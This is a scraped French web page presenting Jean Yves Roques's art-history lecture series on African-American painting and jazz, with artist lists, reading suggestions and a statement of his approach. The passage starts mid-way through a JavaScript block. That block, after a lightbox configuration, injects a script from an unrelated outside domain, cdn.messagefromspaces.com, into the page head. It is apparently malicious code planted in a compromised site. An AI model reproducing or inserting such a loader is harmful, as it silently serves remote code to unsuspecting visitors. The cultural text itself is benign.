, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

ATTENTION A LA PEINTURE

« GRANDS NOMS A LA FRONTIERE DE L’ART & DE LA MODE »

———————————————————————————————————————————————————————————————————

« LA PEINTURE & LE JAZZ  » est une série de conférences multimédia mêlant histoire de l’art, du jazz et de la soul, et des évènements politiques.
Elle est écrite et racontée par Jean Yves Roques, accompagné au piano par Arnaud Labastie.afficheA3-jazz_2

« LA PEINTURE & LE JAZZ / Une Harlem Renaissance – Part 1″ La peinture africaine-américaine dans le siècle du jazz et du blues


affiche Freedom now LP&LJ part 2« La Peinture & le Jazz / FREEDOM NOW – Part 2″
Les peintres africains-américains, femmes et hommes, de l’après guerre aux années 68-70, jusqu’à aujourd’hui


Voici quelques extraits sonores de la conférence :

Peintres et artistes présenté-e-s lors de la conférence :
Loïs Mailou-Jones / Horace Pippin / Augusta Savage / Charles Alston / Laura Wheeler / William H Johnson / Claude Clark / Elisabeth Catlett / Henri Matisse / Stuart Davis / Norman Lewis / Beauford Delaney / Bob Thomson / Andy Wahrol / Joe Overstreet / Romare Bearden /  Norman Rockwell / Alice Neel / Joe Riddle / Reginald Gammon / Emma Amos / Alma Thomas / Mavis Pusey / William T Williams / Faith Ringgold / Gerald Williams / Barbara Jones- Hogu / Emory Douglas / Jae Jarrell / Dindga McCannon / Wadsworth Jarrell / Davis Hammons / Bettye Saar / Barkley Hendricks / J-M Basquiat / Miles Davis / Kara Walker / Marc Bradford / Amy Sherald / Kehinde Wiley 

Quelques ouvrages, disques ou Dvd :
« The colour line » – Musée quai Branly / « Le siècle du Jazz » – Musée Quai Branly / « Free Jazz » – P.Carles J.L Comolli …
« Freedom now suite » – Max Roach & Abbey Lincoln – « Attica blues » Archie Shepp – « Soul of a nation I & II « compilation Soul jazz records –
« Black panthers » Agnés Varda…
—————————————————————————————————————————————————————————————————————-

« UN CHEVALET DANS LA CUISINE »

[Cliquer sur l'image pour élargir. Collage de jyr]
Voici quelques extraits sonores de la conférence :

———————————————————————————————————————————————————————————————————————————————–

LOGO 2017

 

Depuis 2011, Jean Yves Roques propose de partager une recherche anthropoétique dans le patrimoine artistique. Plusieurs séries de conférences ont été réalisées, d’abord à la médiathèque de Tarnos au rythme de 3/an, puis se sont ajoutés 3 autres rendez vous annuels à l’Apollo de  Boucau. Plus récemment, en plus de ces rendez vous réguliers, d’autres ont lieu chaque années en divers lieux de Bayonne (Musée basque, Médiathèque, Didam) ou des environs.

Intention :
Des oeuvres connues d’époques passées ou contemporaines sont le moyen de réouvrir les portes de l’histoire, de découvrir de vastes pans de culture souvent ignorés.
C’est aussi le lieu où trouver à lire dans le miroir des oeuvres ce que nous sommes, humains à l’aventure de nous même.
Equipés d’instruments rationnels, et tachant d’être libre de toute idéologie.
La poèsie, au sens fort et substantiel, non littéraire, reste le gouvernail.

Cela suppose donc qu’il y ait encore des choses à reconsidérer dans les objets d’art visuel laissés par l’humanité du passé, conservées dans les oeuvres qui vivent/dorment dans le spectacle des musées.
Leur contenu anthropoétique est la faculté qu’elles ont de communiquer durablement à travers le temps leur tension vers un accomplissement.
C’est ce potentiel toujours relatif qui est enregistré à chaque époque, dans les lieux et les conditions où la culture de la civilisation a pu se développer.
Mais aussi s’enliser, se perdre, et se retrouver.
C’est par ce côté humain à la fleur de l’action que l’oeuvre d’art est tant prisée. La valeur marchande ne fait que courir derrière cette valeur anthropologique-poétique.
C’est ce que l’enquête historique et la libre interprétation rationnelle réussit à éclairer.
C’est ce que l’anthropoétique formule et propose.

La voie du langage poètique est à cheval entre le visuel et le parlé, l’écrit et le manifesté.
C’est cette synthèse qui s’opère dans l’oeuvre à la proue d’elle même. C’est elle qui est toujours active et présente pour l’oeil critiquement éduqué.

« Je ne me souviens pas, je me rappelle »  dit la poésie.
L’anthropoètique en histoire de l’art est cet exercice de rappellement, ce mouvement de reformulation, dans une « longue immense et raisonnée réorganisation de tous les sens » …
***

Voici une première série de conférences ( 2011-12 / 2013-14) qui ont ouverts des champs vers la Renaissance, l’Afrique, l’Amérique, la poétique moderne, le monde contemporain :

Une deuxième série (2014-15/ 2015-16) a creusé en direction de la Renaissance, du thème des femmes, de l’Amérique et de l’intercontinentalité, du XXeme siècle et du monde contemporain, avec une touche vers l’histoire locale :

Une troisième série creuse l’histoire « locale », élargit  à l’histoire culturelle (BD, Chocolat, cuisine), approfondit des grandes oeuvres baroques, ouvre à l’échelle mondiale de l’art contemporain, continue l’histoire du jazz …

 

Laisser un commentaire

Votre e-mail ne sera jamais publié ni communiqué. Les champs obligatoires sont indiqués par *

*
*

Vous pouvez utiliser ces balises et attributs HTML : <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

 
  • Recherche par mots-clefs